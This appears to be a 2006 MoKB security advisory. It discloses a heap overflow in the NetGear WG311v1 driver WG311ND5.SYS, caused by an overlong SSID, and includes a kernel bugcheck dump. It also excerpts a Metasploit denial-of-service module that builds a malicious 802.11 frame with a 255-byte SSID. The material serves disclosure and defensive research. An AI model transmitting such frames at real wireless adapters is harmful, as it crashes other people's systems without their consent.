MOKB-22-11-2006

Bug details
Title: NetGear WG311v1 Wireless Driver Long SSID Overflow
Description: The NetGear WG311v1 wireless adapter (PCI) ships with a version of WG311ND5.SYS that is vulnerable to a heap-based buffer overflow condition. This issue may lead to arbitrary kernel-mode code execution (1). NetGear was NOT contacted about this flaw.

WG311v1 Driver Download (vulnerable)
Author/Contributor: Laurent Butti <laurent.butti [at] orange-ftgroup.com> - discovery and exploit development.
NA<NA[at] info-pull.com> - MoKB release.
References:
Proof of concept or exploit: Metasploit Module: auxiliary/dos/wireless/netgear_wg311pci.rb
Debugging information:

This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a NetGear WG311v1 PCI adapter.
Although this driver is for the Windows operating system, Linux and FreeBSD users of the ndiswrapper tool should determine if they are using WG311ND5.SYS and upgrade accordingly.

1: A remote code execution module for Metasploit is also in development, thus this release might be subject of updates as necessary.

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: 81cae7b0, The pool entry we were looking for within the page.
Arg3: 81cae8c8, The next pool entry.
Arg4: 0a23002b, (reserved)

------------- framework3/trunk/modules/auxiliary/dos/wireless/netgear_wg311pci.rb
		frame = 
			"\x50" +                      # type/subtype
			"\x00" +                      # flags
			"\x00\x00" +                  # duration  
			eton(datastore['ADDR_DST']) + # dst
			bssid +                       # src
			bssid +                       # bssid
			seq   +                       # seq  
			Rex::Text.rand_text(8) +      # timestamp value
			"\x64\x00" + 	              # beacon interval
			"\x01\x00" +	              # capabilities

			# SSID IE overflow
			"\x00" + "\xff" + ("\x41" * 255) +

			# supported rates IE
			"\x01" + "\x08" + "\x02\x04\x0b\x16\x0c\x18\x30\x48" +

			# channel IE
			"\x03" + "\x01" + channel.chr
------------- framework3/trunk/modules/auxiliary/dos/wireless/netgear_wg311pci.rb